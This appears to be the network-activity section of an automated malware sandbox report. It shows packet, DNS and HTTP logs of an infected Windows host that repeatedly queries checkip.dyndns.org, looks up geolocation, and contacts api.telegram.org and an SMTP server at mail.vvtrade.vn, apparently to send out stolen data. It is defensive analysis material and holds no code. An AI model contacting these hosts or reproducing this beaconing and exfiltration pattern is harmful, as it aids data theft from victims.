Jul 25, 2024 03:35:30.856669903 CEST | 49747 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:30.864969015 CEST | 80 | 49747 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:31.458009958 CEST | 80 | 49747 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:31.460319042 CEST | 49748 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:31.460365057 CEST | 443 | 49748 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:31.460561037 CEST | 49748 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:31.460794926 CEST | 49748 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:31.460808039 CEST | 443 | 49748 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:31.514089108 CEST | 49747 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:31.940102100 CEST | 443 | 49748 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:31.941934109 CEST | 49748 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:31.941953897 CEST | 443 | 49748 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:32.136095047 CEST | 443 | 49748 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:32.136230946 CEST | 443 | 49748 | 188.114.97.3 | 192.168.2.5
Jul 25, 2024 03:35:32.136313915 CEST | 49748 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:32.136825085 CEST | 49748 | 443 | 192.168.2.5 | 188.114.97.3
Jul 25, 2024 03:35:32.166186094 CEST | 49747 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:32.167032957 CEST | 49749 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:32.167068958 CEST | 443 | 49749 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:32.167149067 CEST | 49749 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:32.167562008 CEST | 49749 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:32.167568922 CEST | 443 | 49749 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:32.172365904 CEST | 80 | 49747 | 158.101.44.242 | 192.168.2.5
Jul 25, 2024 03:35:32.172440052 CEST | 49747 | 80 | 192.168.2.5 | 158.101.44.242
Jul 25, 2024 03:35:32.795417070 CEST | 443 | 49749 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:32.797219038 CEST | 49749 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:32.797219038 CEST | 49749 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:32.797234058 CEST | 443 | 49749 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:32.797544956 CEST | 443 | 49749 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:32.798888922 CEST | 49749 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:32.844490051 CEST | 443 | 49749 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:33.045531988 CEST | 443 | 49749 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:33.045639038 CEST | 443 | 49749 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:33.045892000 CEST | 49749 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:33.048383951 CEST | 49749 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:39.174560070 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:39.179637909 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:39.179763079 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:40.596565008 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:40.597001076 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:40.601828098 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:40.947813988 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:40.948426008 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:40.953339100 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:41.298463106 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:41.298823118 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:41.303607941 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:41.664545059 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:41.664872885 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:41.669727087 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.014945030 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.015125036 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:42.019934893 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.515909910 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.516088963 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:42.521017075 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.866134882 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.866903067 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:42.866903067 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:42.866959095 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:42.866959095 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:42.871696949 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.871717930 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.871861935 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.871870995 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:42.871880054 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:49.490308046 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:49.493995905 CEST | 49751 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:49.494048119 CEST | 443 | 49751 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:49.494184971 CEST | 49751 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:49.494404078 CEST | 49751 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:49.494416952 CEST | 443 | 49751 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:49.545152903 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:50.129125118 CEST | 443 | 49751 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:50.131795883 CEST | 49751 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:50.131819010 CEST | 443 | 49751 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:50.131921053 CEST | 49751 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:50.131932020 CEST | 443 | 49751 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:50.364171982 CEST | 443 | 49751 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:50.364267111 CEST | 443 | 49751 | 149.154.167.220 | 192.168.2.5
Jul 25, 2024 03:35:50.364331007 CEST | 49751 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:50.364670038 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:50.364837885 CEST | 49751 | 443 | 192.168.2.5 | 149.154.167.220
Jul 25, 2024 03:35:50.371274948 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:50.715406895 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:50.715454102 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Jul 25, 2024 03:35:50.715576887 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:50.715576887 CEST | 49750 | 587 | 192.168.2.5 | 118.69.190.131
Jul 25, 2024 03:35:50.724412918 CEST | 587 | 49750 | 118.69.190.131 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 03:34:34.889838934 CEST | 62769 | 53 | 192.168.2.5 | 1.1.1.1
Jul 25, 2024 03:34:34.915257931 CEST | 53 | 62769 | 1.1.1.1 | 192.168.2.5
Jul 25, 2024 03:34:36.254282951 CEST | 49963 | 53 | 192.168.2.5 | 1.1.1.1
Jul 25, 2024 03:34:36.261763096 CEST | 53 | 49963 | 1.1.1.1 | 192.168.2.5
Jul 25, 2024 03:34:47.487230062 CEST | 56252 | 53 | 192.168.2.5 | 1.1.1.1
Jul 25, 2024 03:34:47.494232893 CEST | 53 | 56252 | 1.1.1.1 | 192.168.2.5
Jul 25, 2024 03:34:54.734883070 CEST | 54988 | 53 | 192.168.2.5 | 1.1.1.1
Jul 25, 2024 03:34:55.210252047 CEST | 53 | 54988 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 03:34:34.889838934 CEST | 192.168.2.5 | 1.1.1.1 | 0xf95 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:36.254282951 CEST | 192.168.2.5 | 1.1.1.1 | 0xf9fa | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:47.487230062 CEST | 192.168.2.5 | 1.1.1.1 | 0xecc | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:54.734883070 CEST | 192.168.2.5 | 1.1.1.1 | 0xe7cb | Standard query (0) | mail.vvtrade.vn | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 03:34:34.915257931 CEST | 1.1.1.1 | 192.168.2.5 | 0xf95 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 03:34:34.915257931 CEST | 1.1.1.1 | 192.168.2.5 | 0xf95 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:34.915257931 CEST | 1.1.1.1 | 192.168.2.5 | 0xf95 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:34.915257931 CEST | 1.1.1.1 | 192.168.2.5 | 0xf95 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:34.915257931 CEST | 1.1.1.1 | 192.168.2.5 | 0xf95 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:34.915257931 CEST | 1.1.1.1 | 192.168.2.5 | 0xf95 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:36.261763096 CEST | 1.1.1.1 | 192.168.2.5 | 0xf9fa | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:36.261763096 CEST | 1.1.1.1 | 192.168.2.5 | 0xf9fa | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:47.494232893 CEST | 1.1.1.1 | 192.168.2.5 | 0xecc | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 03:34:55.210252047 CEST | 1.1.1.1 | 192.168.2.5 | 0xe7cb | No error (0) | mail.vvtrade.vn | - | 118.69.190.131 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 158.101.44.242 | 80 | 5260 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jul 25, 2024 03:34:34.928858042 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 25, 2024 03:34:35.529810905 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 01:34:35 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cd027b2aa5a004069f132d71811e6a3e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 03:34:35.534837961 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 25, 2024 03:34:35.705096006 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 01:34:35 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 77abd8fb4f2affef2372dd936f33d6c0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 03:34:37.297250986 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 25, 2024 03:34:37.468378067 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 01:34:37 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 40124971301770b4e38286b02bf9db9f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 158.101.44.242 | 80 | 5260 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jul 25, 2024 03:34:38.141247988 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 25, 2024 03:34:38.774713039 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 01:34:38 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8f9508484bd9c064de147ca236a741dc
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49709 | 158.101.44.242 | 80 | 5260 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jul 25, 2024 03:34:39.417939901 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 25, 2024 03:34:40.090599060 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Jul 2024 01:34:39 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 77ec107762ee12b846e8f79757092a3f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49711 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:34:40.751226902 CEST | 127 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:41.385307074 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:41 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 811357442121ef4d4872e79af74668d6
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49713 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:34:42.044313908 CEST | 127 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:42.646853924 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:42 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: c29a6367ac87154934bbe9af258b58d9
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49715 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:34:43.305710077 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:43.904547930 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:43 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 568d5e7a93cc5b6068b4432a5f43a311
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49717 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:34:44.836606026 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:45.479860067 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:45 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: cfb921e7a08799752d9f5786a4c4ec32
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49719 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 5260 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:34:46.159454107 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:46.787453890 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:46 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 788ad6c4d1548a5ad10fcff06d1d98ae
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49722 | Destination IP: 158.101.44.242 | Destination Port: 80 | PID: 6024 | Process: C:\Windows\SysWOW64\svchost.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jul 25, 2024 03:34:49.139708996 CEST | 151 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:50.102118969 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 19d5a3b224f09e10d21151cb9264da3b
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 25, 2024 03:34:50.112905025 CEST | 127 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:50.316365004 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: b3886f8a215f8f02e9fe12f4453a4d66
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 25, 2024 03:34:51.615945101 CEST | 127 | OUT | GET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:52.521858931 CEST | 320 | IN | HTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:52 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
